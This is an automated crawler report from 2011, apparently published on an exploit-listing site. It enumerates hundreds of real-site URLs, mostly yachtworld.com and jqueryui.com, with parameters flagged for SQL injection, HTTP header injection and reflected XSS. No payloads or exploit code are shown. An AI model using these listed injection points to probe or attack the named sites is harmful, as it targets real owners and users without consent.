Cross Site Scripting, SQL Injection, HTTP Header Injection, Report for January 27, 2011

XSS, SQLi, HTTPi, CWE-79, CWE-89, CWE-113 | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 19:20:18 CST 2011.

Exploit Store

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s41495727926958 [REST URL parameter 5]

1.2. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s42079387209378 [REST URL parameter 3]

1.3. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43482092181220 [REST URL parameter 1]

1.4. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43772089285776 [REST URL parameter 1]

1.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 1]

1.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 4]

1.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [VIEWED_BOATS_STORE cookie]

1.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [primary_photo_id parameter]

2. HTTP header injection

2.1. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]

2.2. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]

2.3. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

2.4. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

2.5. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

2.6. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]

2.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [currency parameter]

2.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

2.9. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]

2.10. https://www.yachtworld.com/ [savedLabel0 cookie]

2.11. https://www.yachtworld.com/ [savedLabel1 cookie]

2.12. http://wzus1.ask.com/i/i.gif [REST URL parameter 1]

2.13. http://wzus1.ask.com/i/i.gif [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.2. http://ads.pointroll.com/PortalServe/ [r parameter]

3.3. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.4. http://ads.pointroll.com/PortalServe/ [time parameter]

3.5. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]

3.6. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]

3.7. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]

3.8. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]

3.9. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]

3.10. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]

3.11. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

3.12. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.13. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.14. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.15. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.16. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.17. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.18. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.19. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.20. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.21. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.30. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.31. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.32. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.33. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.34. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.35. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.36. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.37. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.38. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.39. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.40. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.41. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.42. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.43. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.44. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.45. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.46. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.47. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.48. http://jqueryui.com/themeroller/ [fcActive parameter]

3.49. http://jqueryui.com/themeroller/ [fcContent parameter]

3.50. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.51. http://jqueryui.com/themeroller/ [fcError parameter]

3.52. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.53. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.54. http://jqueryui.com/themeroller/ [fcHover parameter]

3.55. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.56. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.57. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.58. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.59. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.60. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.61. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.62. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.63. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.64. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.65. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.66. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.67. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.68. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.69. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.70. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.71. http://ss.ask.com/query [fn parameter]

3.72. http://ss.ask.com/query [q parameter]

3.73. http://www.ask.com/ans [l parameter]

3.74. http://www.ask.com/pictures [l parameter]

3.75. http://www.ask.com/pictures [q parameter]

3.76. http://www.ask.com/pictureslanding [l parameter]

3.77. http://www.ask.com/web [q parameter]

3.78. http://www.ask.com/web [qid parameter]

3.79. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]

3.80. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]

3.81. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 3]

3.82. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 4]

3.83. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 5]

3.84. https://www.linkedin.com/secure/login [REST URL parameter 1]

3.85. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

3.86. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

3.87. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

3.88. http://www.yachtworld.com/bluewater/email.cgi [office_id parameter]

3.89. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 4]

3.90. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 5]

3.91. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 6]

3.92. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [name of an arbitrarily supplied request parameter]

3.93. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 4]

3.94. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 5]

3.95. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 6]

3.96. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [name of an arbitrarily supplied request parameter]

3.97. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 4]

3.98. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 5]

3.99. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 6]

3.100. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [name of an arbitrarily supplied request parameter]

3.101. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 4]

3.102. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]

3.103. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]

3.104. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [name of an arbitrarily supplied request parameter]

3.105. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 4]

3.106. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 5]

3.107. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 6]

3.108. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [name of an arbitrarily supplied request parameter]

3.109. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 4]

3.110. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 5]

3.111. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 6]

3.112. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [name of an arbitrarily supplied request parameter]

3.113. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 4]

3.114. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 5]

3.115. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 6]

3.116. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [name of an arbitrarily supplied request parameter]

3.117. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 4]

3.118. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 5]

3.119. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 6]

3.120. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [name of an arbitrarily supplied request parameter]

3.121. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 4]

3.122. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 5]

3.123. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 6]

3.124. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [name of an arbitrarily supplied request parameter]

3.125. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 4]

3.126. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 5]

3.127. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 6]

3.128. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [name of an arbitrarily supplied request parameter]

3.129. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 4]

3.130. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 5]

3.131. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 6]

3.132. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]

3.133. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]

3.134. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 4]

3.135. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 5]

3.136. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 6]

3.137. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [name of an arbitrarily supplied request parameter]

3.138. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 4]

3.139. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 5]

3.140. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 6]

3.141. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [name of an arbitrarily supplied request parameter]

3.142. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 4]

3.143. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 5]

3.144. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 6]

3.145. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [name of an arbitrarily supplied request parameter]

3.146. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 4]

3.147. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 5]

3.148. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 6]

3.149. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [name of an arbitrarily supplied request parameter]

3.150. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 4]

3.151. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 5]

3.152. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 6]

3.153. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [name of an arbitrarily supplied request parameter]

3.154. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 4]

3.155. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 5]

3.156. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [name of an arbitrarily supplied request parameter]

3.157. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 4]

3.158. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 5]

3.159. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 6]

3.160. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [name of an arbitrarily supplied request parameter]

3.161. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 4]

3.162. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 5]

3.163. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 6]

3.164. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [name of an arbitrarily supplied request parameter]

3.165. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 4]

3.166. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 5]

3.167. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 6]

3.168. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [name of an arbitrarily supplied request parameter]

3.169. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [REST URL parameter 4]

3.170. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [REST URL parameter 5]

3.171. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [name of an arbitrarily supplied request parameter]

3.172. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 4]

3.173. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 5]

3.174. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 6]

3.175. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]

3.176. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]

3.177. http://www.yachtworld.com/boats/Power/Bowrider/1 [REST URL parameter 4]

3.178. http://www.yachtworld.com/boats/Power/Bowrider/1 [REST URL parameter 4]

3.179. http://www.yachtworld.com/boats/Power/Center+Console/1 [REST URL parameter 4]

3.180. http://www.yachtworld.com/boats/Power/Convertible+Boat/1 [REST URL parameter 4]

3.181. http://www.yachtworld.com/boats/Power/Cruiser/1 [REST URL parameter 4]

3.182. http://www.yachtworld.com/boats/Power/Cuddy+Cabin/1 [REST URL parameter 4]

3.183. http://www.yachtworld.com/boats/Power/Express+Cruiser/1 [REST URL parameter 4]

3.184. http://www.yachtworld.com/boats/Power/Flybridge/1 [REST URL parameter 4]

3.185. http://www.yachtworld.com/boats/Power/Motor+Yacht/1 [REST URL parameter 4]

3.186. http://www.yachtworld.com/boats/Power/Other/1 [REST URL parameter 4]

3.187. http://www.yachtworld.com/boats/Power/Saltwater+Fishing/1 [REST URL parameter 4]

3.188. http://www.yachtworld.com/boats/Power/Sport+Fishing/1 [REST URL parameter 4]

3.189. http://www.yachtworld.com/boats/Power/Trawler/1 [REST URL parameter 4]

3.190. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]

3.191. http://www.yachtworld.com/boats/Sail/Cruiser/1 [REST URL parameter 4]

3.192. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 3]

3.193. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 4]

3.194. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 5]

3.195. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 3]

3.196. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 4]

3.197. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 5]

3.198. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 3]

3.199. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 4]

3.200. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 5]

3.201. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 3]

3.202. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 4]

3.203. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 5]

3.204. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 3]

3.205. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 4]

3.206. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 5]

3.207. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 3]

3.208. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 4]

3.209. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 5]

3.210. http://www.yachtworld.com/boats/category/type/Cape+Dory/1 [REST URL parameter 3]

3.211. http://www.yachtworld.com/boats/category/type/Cape+Dory/1 [REST URL parameter 4]

3.212. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 3]

3.213. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 4]

3.214. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 5]

3.215. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 3]

3.216. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 4]

3.217. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 5]

3.218. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 3]

3.219. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 4]

3.220. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 5]

3.221. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 3]

3.222. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 4]

3.223. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 5]

3.224. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 3]

3.225. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 4]

3.226. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 5]

3.227. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 3]

3.228. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 4]

3.229. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 5]

3.230. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 3]

3.231. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 4]

3.232. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 5]

3.233. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 3]

3.234. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 4]

3.235. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 5]

3.236. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 3]

3.237. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 4]

3.238. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 5]

3.239. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 3]

3.240. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 4]

3.241. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 5]

3.242. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 3]

3.243. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 4]

3.244. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 5]

3.245. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 3]

3.246. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 4]

3.247. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 5]

3.248. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 3]

3.249. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 4]

3.250. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 5]

3.251. http://www.yachtworld.com/boats/category/type/Island+Packett/1 [REST URL parameter 3]

3.252. http://www.yachtworld.com/boats/category/type/Island+Packett/1 [REST URL parameter 4]

3.253. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 3]

3.254. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 4]

3.255. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 5]

3.256. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 3]

3.257. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 4]

3.258. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 5]

3.259. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 3]

3.260. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 4]

3.261. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 5]

3.262. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 3]

3.263. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 4]

3.264. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 5]

3.265. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 3]

3.266. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 4]

3.267. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 5]

3.268. http://www.yachtworld.com/boats/category/type/Regulator [REST URL parameter 3]

3.269. http://www.yachtworld.com/boats/category/type/Regulator [REST URL parameter 4]

3.270. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 3]

3.271. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 4]

3.272. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 5]

3.273. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 3]

3.274. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 4]

3.275. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 5]

3.276. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 3]

3.277. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 4]

3.278. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 5]

3.279. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 3]

3.280. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 4]

3.281. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 5]

3.282. http://www.yachtworld.com/boats/category/type/Tartan/1 [REST URL parameter 3]

3.283. http://www.yachtworld.com/boats/category/type/Tartan/1 [REST URL parameter 4]

3.284. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 3]

3.285. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 4]

3.286. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 5]

3.287. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 3]

3.288. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 4]

3.289. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 5]

3.290. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 3]

